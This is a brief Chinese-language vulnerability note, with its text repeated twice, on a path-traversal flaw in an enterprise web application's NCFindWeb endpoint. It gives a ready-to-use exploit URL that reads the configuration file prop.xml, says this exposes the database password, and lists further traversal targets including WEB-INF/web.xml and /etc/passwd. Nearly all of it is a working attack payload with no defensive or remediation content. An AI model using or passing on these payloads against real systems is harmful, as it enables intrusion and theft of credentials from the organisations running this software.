该漏洞权限比较大,可以获取数据库,/etc/passwd等信息,漏洞存在链接: http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
可以读取到数据库密码
WEB-INF/web.xml
../../../../../etc/passwd
该漏洞权限比较大,可以获取数据库,/etc/passwd等信息,漏洞存在链接: http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
可以读取到数据库密码
WEB-INF/web.xml
../../../../../etc/passwd